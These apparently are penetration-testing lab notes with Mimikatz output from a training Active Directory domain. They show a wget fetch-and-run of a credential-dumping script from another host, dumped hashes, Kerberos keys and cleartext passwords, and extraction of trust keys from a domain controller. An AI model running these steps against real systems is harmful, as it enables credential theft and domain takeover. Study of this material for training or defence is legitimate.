rc4_hmac_nt f76f48c176dc09cfd5765843c32809f3
rc4_hmac_old f76f48c176dc09cfd5765843c32809f3
rc4_md4 f76f48c176dc09cfd5765843c32809f3
rc4_hmac_nt_exp f76f48c176dc09cfd5765843c32809f3
rc4_hmac_old_exp f76f48c176dc09cfd5765843c32809f3
dcorp-adminsrv dump
[dcorp-adminsrv]: PS C:\\Windows\\Temp> wget -Uri <http://172.16.100.22/Invoke-MimiEx.ps1> -OutFile Invoke-MimiEx.ps1
[dcorp-adminsrv]: PS C:\\Windows\\Temp> .\\Invoke-MimiEx.ps1
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(powershell) # sEKurlSa::EkEyS
Authentication Id : 0 ; 223555 (00000000:00036943)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:42:07 PM
SID : S-1-5-96-0-2
* Username : DCORP-ADMINSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
* Key List :
aes256_hmac 82ecf869176628379da0ae884b582c36fc2215ef7e8e3e849d720847299257ff
aes128_hmac 3f3532b2260c2851bf57e8b5573f7593
rc4_hmac_nt b5f451985fd34d58d5120816d31b5565
rc4_hmac_old b5f451985fd34d58d5120816d31b5565
rc4_md4 b5f451985fd34d58d5120816d31b5565
rc4_hmac_nt_exp b5f451985fd34d58d5120816d31b5565
rc4_hmac_old_exp b5f451985fd34d58d5120816d31b5565
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DCORP-ADMINSRV$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/20/2024 11:35:06 PM
SID : S-1-5-20
* Username : dcorp-adminsrv$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51
rc4_hmac_nt b5f451985fd34d58d5120816d31b5565
rc4_hmac_old b5f451985fd34d58d5120816d31b5565
rc4_md4 b5f451985fd34d58d5120816d31b5565
rc4_hmac_nt_exp b5f451985fd34d58d5120816d31b5565
rc4_hmac_old_exp b5f451985fd34d58d5120816d31b5565
Authentication Id : 0 ; 240669 (00000000:0003ac1d)
Session : RemoteInteractive from 2
User Name : srvadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/20/2024 11:42:17 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1115
* Username : srvadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4
rc4_hmac_nt a98e18228819e8eec3dfa33cb68b0728
rc4_hmac_old a98e18228819e8eec3dfa33cb68b0728
rc4_md4 a98e18228819e8eec3dfa33cb68b0728
rc4_hmac_nt_exp a98e18228819e8eec3dfa33cb68b0728
rc4_hmac_old_exp a98e18228819e8eec3dfa33cb68b0728
Authentication Id : 0 ; 131118 (00000000:0002002e)
Session : Service from 0
User Name : appadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/20/2024 11:35:23 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1117
* Username : appadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : *ActuallyTheWebServer1
* Key List :
aes256_hmac 68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb
aes128_hmac 449e9900eb0d6ccee8dd9ef66965797e
rc4_hmac_nt d549831a955fee51a43c83efb3928fa7
rc4_hmac_old d549831a955fee51a43c83efb3928fa7
rc4_md4 d549831a955fee51a43c83efb3928fa7
rc4_hmac_nt_exp d549831a955fee51a43c83efb3928fa7
rc4_hmac_old_exp d549831a955fee51a43c83efb3928fa7
Authentication Id : 0 ; 131034 (00000000:0001ffda)
Session : Service from 0
User Name : websvc
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/20/2024 11:35:23 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1114
* Username : websvc
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : AServicewhichIsNotM3@nttoBe
* Key List :
aes256_hmac 2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
aes128_hmac 86a353c1ea16a87c39e2996253211e41
rc4_hmac_nt cc098f204c5887eaa8253e7c2749156f
rc4_hmac_old cc098f204c5887eaa8253e7c2749156f
rc4_md4 cc098f204c5887eaa8253e7c2749156f
rc4_hmac_nt_exp cc098f204c5887eaa8253e7c2749156f
rc4_hmac_old_exp cc098f204c5887eaa8253e7c2749156f
Authentication Id : 0 ; 20853 (00000000:00005175)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:35:06 PM
SID : S-1-5-96-0-0
* Username : DCORP-ADMINSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
* Key List :
aes256_hmac 82ecf869176628379da0ae884b582c36fc2215ef7e8e3e849d720847299257ff
aes128_hmac 3f3532b2260c2851bf57e8b5573f7593
rc4_hmac_nt b5f451985fd34d58d5120816d31b5565
rc4_hmac_old b5f451985fd34d58d5120816d31b5565
rc4_md4 b5f451985fd34d58d5120816d31b5565
rc4_hmac_nt_exp b5f451985fd34d58d5120816d31b5565
rc4_hmac_old_exp b5f451985fd34d58d5120816d31b5565
Authentication Id : 0 ; 20821 (00000000:00005155)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/20/2024 11:35:06 PM
SID : S-1-5-96-0-1
* Username : DCORP-ADMINSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
* Key List :
aes256_hmac 82ecf869176628379da0ae884b582c36fc2215ef7e8e3e849d720847299257ff
aes128_hmac 3f3532b2260c2851bf57e8b5573f7593
rc4_hmac_nt b5f451985fd34d58d5120816d31b5565
rc4_hmac_old b5f451985fd34d58d5120816d31b5565
rc4_md4 b5f451985fd34d58d5120816d31b5565
rc4_hmac_nt_exp b5f451985fd34d58d5120816d31b5565
rc4_hmac_old_exp b5f451985fd34d58d5120816d31b5565
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DCORP-ADMINSRV$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/20/2024 11:35:05 PM
SID : S-1-5-18
* Username : dcorp-adminsrv$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51
rc4_hmac_nt b5f451985fd34d58d5120816d31b5565
rc4_hmac_old b5f451985fd34d58d5120816d31b5565
rc4_md4 b5f451985fd34d58d5120816d31b5565
rc4_hmac_nt_exp b5f451985fd34d58d5120816d31b5565
rc4_hmac_old_exp b5f451985fd34d58d5120816d31b5565
Trust Dump
[dcorp-dc]: PS C:\\Users\\Administrator\\Documents> .\\BetterSafetyKatz.exe '"lsadump::trust /patch"' "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # lsadump::trust /patch
Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)
Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
* 6/27/2024 12:12:19 AM - CLEAR - 26 43 99 cb bb 6d 10 f0 04 37 57 bd fa 1f 77 d6 93 28 68 1f 5d 35 a8 e3 b1 25 46 e7
* aes256_hmac cfb1299ec914c29461e1b57009c8b39c9239aca222a86d748be4e6a953ac7ca4
* aes128_hmac e5f04970548f0b240ee6947605fce7b5
* rc4_hmac_nt 68a7f836e94f9668b8a215d486f23a38
[ Out ] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 6/27/2024 12:12:19 AM - CLEAR - 26 43 99 cb bb 6d 10 f0 04 37 57 bd fa 1f 77 d6 93 28 68 1f 5d 35 a8 e3 b1 25 46 e7
* aes256_hmac 47641f8bc724115760c2ef5ab1941996dcef5be9bdce13bcf5057d3036694667
* aes128_hmac 13c6b14ec690d6e5e17377bd9d285c8a
* rc4_hmac_nt 68a7f836e94f9668b8a215d486f23a38
[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
* 6/27/2024 12:11:53 AM - CLEAR - 9c fe ec 1b d3 ed ee 2f 21 34 aa f7 77 c1 6d 5e d6 65 50 6f 82 33 df 17 5c 3a 95 49
* aes256_hmac fd9f9e762002c3a0c0d3b4681ae0bd9f0abf1484a0a8c8523ddf325b4035ade7
* aes128_hmac 9e9914fc26168e51a4d44a3851ec9506
* rc4_hmac_nt 881744a51055cdda6698c535e629fc1d
[Out-1] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 6/27/2024 12:11:53 AM - CLEAR - 9c fe ec 1b d3 ed ee 2f 21 34 aa f7 77 c1 6d 5e d6 65 50 6f 82 33 df 17 5c 3a 95 49
* aes256_hmac 786dc532d32610fbe36bc004490091ad1c744186269195dd58ac9ac36b665fd0
* aes128_hmac 276b6a9960f4158694f028405d7395a9
* rc4_hmac_nt 881744a51055cdda6698c535e629fc1d
Domain: US.DOLLARCORP.MONEYCORP.LOCAL (US / S-1-5-21-1028785420-4100948154-1806204659)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
* 7/12/2024 10:16:10 PM - CLEAR - cf e8 36 49 c3 08 a6 2a fe 76 d2 0a 0c 5c aa e5 67 a1 af f6 25 bb ec d0 ed 1e 08 5d
* aes256_hmac 64424a8f2a4def288b986a3747c3eed7493e1d75bfff0461afbb072180e61afe
* aes128_hmac f4aaf5eb7059977b9ea4cde31ee8eddc
* rc4_hmac_nt 214a518fb9edf4be816f207b9ba19d69
[ Out ] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 7/12/2024 10:16:10 PM - CLEAR - cf e8 36 49 c3 08 a6 2a fe 76 d2 0a 0c 5c aa e5 67 a1 af f6 25 bb ec d0 ed 1e 08 5d
* aes256_hmac 2bf47a8aca4420dbd00c836677489636bace0cf279d20387eae2c935f8816652
* aes128_hmac 2ed7f416a3a42794e54e3b567eaa0e53
* rc4_hmac_nt 214a518fb9edf4be816f207b9ba19d69
[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
* 7/12/2024 10:03:04 PM - CLEAR - 0c f8 9f d9 54 46 8a 29 23 0c 65 1f 45 69 c8 c7 6d f0 5c bf eb 69 63 52 f9 3c 2a dd
* aes256_hmac fed485bb861c2a70cf8436cc2bc561bdd7502ff3f06a3e0116e93de860617216
* aes128_hmac 25f49733618f43d90ac60661e0d45e6a
* rc4_hmac_nt 5254e4d05c51a801670314042ae33f40
[Out-1] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 7/12/2024 10:03:04 PM - CLEAR - 0c f8 9f d9 54 46 8a 29 23 0c 65 1f 45 69 c8 c7 6d f0 5c bf eb 69 63 52 f9 3c 2a dd
* aes256_hmac b589e722cc645c71e1b6743b64ec68ad4f2e6ffab7ca0fe7e40971713f4ac465
* aes128_hmac 0dd190b6a2217e9f8dbc82d2b7e78e95
* rc4_hmac_nt 5254e4d05c51a801670314042ae33f40
Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
[ In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
* 7/12/2024 10:16:07 PM - CLEAR - 55 cb 05 4c 82 1a 31 bb b8 2d c5 b9 cc fd 2d 3e 33 d5 e0 92 93 cf f9 ac 6f ac 11 ed
* aes256_hmac 225bd65839ee11918c44d7a4819736245a4d54024173ef4a91ef5fb2c29669df
* aes128_hmac aebc8f223defffec09befded2c30d6c4
* rc4_hmac_nt 1fcd1aeb03aab0b98840321e4a0d17f3
[ Out ] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 7/12/2024 10:16:07 PM - CLEAR - 55 cb 05 4c 82 1a 31 bb b8 2d c5 b9 cc fd 2d 3e 33 d5 e0 92 93 cf f9 ac 6f ac 11 ed
* aes256_hmac 03dbd3425e6cc9aa87ed201713d7a8dbb04ef5c651407580a5b2c11e67bff85b
* aes128_hmac 34de1a1db802e71580e907214774dcc9
* rc4_hmac_nt 1fcd1aeb03aab0b98840321e4a0d17f3
[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
* 7/12/2024 10:03:00 PM - CLEAR - 10 fc b0 8b ae b3 a7 21 5f 52 40 d5 f7 e9 45 5a fe 6e ee dd da f7 4b 69 f6 c8 3d a9
* aes256_hmac 684bc2d9fa516539e42ba27f8638ce273444b01768d23001bbbb1c96c2f3a7ca
* aes128_hmac 6b81568547ccd72e875ba5bf92870f6c
* rc4_hmac_nt c1a089de694b99c31207cf85ca9401c7
[Out-1] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
* 7/12/2024 10:03:00 PM - CLEAR - 10 fc b0 8b ae b3 a7 21 5f 52 40 d5 f7 e9 45 5a fe 6e ee dd da f7 4b 69 f6 c8 3d a9
* aes256_hmac 903cd48563f50588d7993632939015e44f15edafe9e0d6ffdc55dec6e990f20c
* aes128_hmac 1181192f6c730988662d1d43a55daba9
* rc4_hmac_nt c1a089de694b99c31207cf85ca9401c7
mimikatz(commandline) # exit
Bye!